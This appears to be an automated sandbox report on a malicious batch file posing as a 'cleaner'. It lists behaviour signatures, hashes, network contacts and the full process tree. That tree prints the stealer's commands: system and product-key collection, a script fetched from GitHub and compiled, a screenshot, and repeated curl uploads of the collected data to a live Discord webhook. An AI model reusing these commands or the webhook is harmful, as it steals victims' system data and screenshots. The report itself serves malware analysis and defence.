Analysis Overview
SHA256
4361ee39760d6451345a135dbb6845f2f17ddab9b1eb6c141c6cd37745b160c4
Threat Level: Known bad
The file SchooiCleaner_1.0___.bat was found to be: Known bad.
Malicious Activity Summary
HawkEye
Blocklisted process makes network request
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Gathers system information
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Gathers network information
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-07-14 13:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-14 13:17
Reported
2024-07-14 13:19
Platform
win11-20240709-en
Max time kernel
136s
Max time network
124s
Command Line
Signatures
HawkEye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\screenCapture.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | api.ipify.org | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SchooiCleaner_1.0___.bat"
C:\Windows\system32\mode.com
mode con cols=80 lines=30
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\chcp.com
chcp 437
C:\Windows\system32\timeout.exe
timeout /t 5 /NOBREAK
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ping -4 -n 1 EHECWUZY | findstr [
C:\Windows\system32\PING.EXE
ping -4 -n 1 EHECWUZY
C:\Windows\system32\findstr.exe
findstr [
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-RestMethod api.ipify.org
C:\Windows\system32\timeout.exe
timeout /t 5 /NOBREAK
C:\Windows\system32\ipconfig.exe
ipconfig
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\Wbem\WMIC.exe
wmic path softwarelicensingservice get OA3xOriginalProductKey
C:\Windows\system32\timeout.exe
timeout /t 5 /NOBREAK
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "irm -useb https://raw.githubusercontent.com/npocmaka/batch.scripts/master/hybrids/.net/c/screenCapture.bat"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /out:"screenCapture.exe" "C:\Users\Admin\AppData\Local\Temp\SCREEN~1.BAT"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79CF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCA8B082AB58D4426B75C42DD92DCEA25.TMP"
C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
screenCapture.exe screenshot.png
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"~=CONNECTION ESTABLISHED=~ \nDate: Sun 07/14/2024 \nTime: 13:17:36.46 \nUsername: Admin \nComputer Name: EHECWUZY \nPublic IP: 194.110.13.70 \nPrivate IP: 10.127.0.146 \nInfo and Screenshot:\"}" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "file1=@Microsoft Edge.lnk" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| N/A | 127.0.0.1:49846 | N/A | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/1068-0-0x00007FF883D23000-0x00007FF883D25000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5wo5z4y.ip3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1068-10-0x000001FD7F510000-0x000001FD7F532000-memory.dmp
memory/1068-9-0x00007FF883D20000-0x00007FF8847E2000-memory.dmp
memory/1068-11-0x00007FF883D20000-0x00007FF8847E2000-memory.dmp
memory/1068-12-0x000001FD7FB60000-0x000001FD7FD22000-memory.dmp
memory/1068-15-0x00007FF883D20000-0x00007FF8847E2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | c314cc5917d5a78a4e88f66d7114878c |
| SHA1 | f4b714a9e5ac21fd60022a65818557e5ed192cf5 |
| SHA256 | eb8e99e59a78efe2b90663fdfca03f6664fed69cfa7a807e88047ffc6d674c31 |
| SHA512 | c02db5c81d2a55ef6b960b7b60b8bc7ad57ae250c1fe8709c40cab7acdcbfcf1fc0675682ea01ffe85cbd4146f67e1c90132d75e014d30403683e856615a4058 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ad60aefe903d80a798b904be4a3f0283 |
| SHA1 | 5a27227a9aec298c043d9fe4162cc64664c01a25 |
| SHA256 | 17c944d3e6e2a0dd06c58ae9cefe305fa7da552c010c012625abcc9585eeb214 |
| SHA512 | 5a9ed746dd825929a2fa1a00b983563538be92a6b85df3728177e3a026babf659c0afadbf544c27aeae9b492b62ac9319af50eeeae610b0aee5256966d96470a |
C:\Users\Admin\AppData\Local\Temp\screenCapture.bat
| MD5 | 7c39bedd33b129b84117cb4e188eb9b6 |
| SHA1 | 43e660c225a60a8327c7ce73ab6abaddcd412122 |
| SHA256 | 2490bf909afee37ddc6dca73d51950c648b815b8d5a1fd853ad9f69413f4a711 |
| SHA512 | de368b8161612f7998f98b15a36028068b08052fceb2468855005cdc5ae6e44bebc8e6d3f0b6d340cd6308597863c003a353fe95eedd6a0a5bb4320e36ba7490 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCCA8B082AB58D4426B75C42DD92DCEA25.TMP
| MD5 | b4aaae3b532554d0c7bd317d4834ab16 |
| SHA1 | 28c854e399a3993ffd0df37b4385e29b4fe12905 |
| SHA256 | d7b2270159728b32e1ed60b03900ab7c9cb3c27df8f2456eae6824ad12f00f62 |
| SHA512 | ac6d36c61b057a0196cda5e249c5184a983bbf490ff1b54a6f263417e10c071addcb8437c840592e31637905e1fee10912e5932f9982e2abedc68cbb4a5e96a8 |
C:\Users\Admin\AppData\Local\Temp\RES79CF.tmp
| MD5 | 0f133e69c8530b8ae98ec4adb4e9b1d0 |
| SHA1 | 065c0f3aec8b2d506d0f2baa03e6e6868118b0c5 |
| SHA256 | 0868235947268f367cb807d65816e4f1596f855cc435b84f99938a4ebafb857d |
| SHA512 | e4e7eddb107b92b4d3e7e748f3c26532cdfcbc5865ef19881afc496ec1d7e00755b2f7fa2a9d6c3d38a9a0a1ff2d6b5043219c4f78c57eef72a5140dcb410b8b |
C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
| MD5 | 4a68364176d5b85c0c42bd1dabdd399d |
| SHA1 | 6b693434b279f571a4e816c175ae12239c226e32 |
| SHA256 | b1437c0601bd59676a95865b8919728f954e22a602c11be285919ab471343762 |
| SHA512 | 9c7af471cdf60f7581e380ebafd37dfee2b0834289383b9de3e768707a447cd8bcb9f271e8a357143d9076ce85bab3fe40a2ccfb3c0f4e60f7660f32e6f57aac |
memory/5800-63-0x0000000000D60000-0x0000000000D68000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ipconfig.txt
| MD5 | dcdb73ae0926f69516bd5b5b9d2d1888 |
| SHA1 | fda0767da11c328981ccb9998af535a7929f0a1f |
| SHA256 | aa743f1eaec4122e2b452997ebc80e7db7fa9583709bb64e3df9a7d15f1bea95 |
| SHA512 | d596a66800fb402a03d42a6b4bc13c9a402f929e761d39ab810ee836377e3c00658231ae730c5488af4f6a223f407d69ded6c484b61058c07cb1bc0625ca984b |
C:\Users\Admin\AppData\Local\Temp\sysinfo.txt
| MD5 | 57ed60900c36f66a54186df4150c80eb |
| SHA1 | e55ea3cb420ae7c6f59f5004e1ce7168efec4b9d |
| SHA256 | a6540f80fc8a3910299935b562b547015fb5fdb8809e604a26018759cbbd5413 |
| SHA512 | 85fd807a25a26430df9ca5512a94c78c576e6cdd35d6cc5ad981758d2afe9e0ff39109464f094cb6ef8158d0759fae3637fe75864b1c997797ce78423f7f27fc |
C:\Users\Admin\AppData\Local\Temp\screenshot.png
| MD5 | f82c9e40b7cae4ff5450ee68768df515 |
| SHA1 | 5c9a0d485be491e63cb11db7e55f675599f84ba6 |
| SHA256 | b451967373e438503dc1eab458bea08fc388c489ffb4c5d31e367f7d6e72f8aa |
| SHA512 | dfd7602f17bf71a190fc058b14f160cb204c951285ba5e1d1da777c71b30d5df6a122366a615a7cde1186f9e2f065b6a95f0fc2ebdc88c30d16ea39f7695e79d |
C:\Users\Admin\AppData\Local\Temp\dir.txt
| MD5 | 851ffc982e513bf50a75b4f81edf582d |
| SHA1 | 3918d31b5136eb012c1c7edb975b0f91a9abbad6 |
| SHA256 | dfdf810615ce2e8f00b24f1ef983789022478969eea1369733692c4fc0180eb4 |
| SHA512 | fb3ef5582b7a70d85dc122d29dff2e98719f1fc42dbd913d5f3479df447034ba5b72ba74d9013e9c32da6ce50517888b3a6fe3f7ce9f02f73c96bfa2ad3d93b4 |
C:\Users\Admin\AppData\Local\Temp\liscense.txt
| MD5 | b77c85675375ed548a4c019ae9ad5eda |
| SHA1 | f1f6559245707e38403b72c57f201784f1086f7d |
| SHA256 | 81a02546f3d9da106053d1800ba1a0c00815a8903661b5c1c086a5c88aedd1f9 |
| SHA512 | 3d6cdefda811dcaaff88f54117f03bfff04a04ba03efdf45167a7c4712bab3334974b404421d5bd1e3ad7eb65b0c390ddf472f9d256bd0cd8786e87ab8571bef |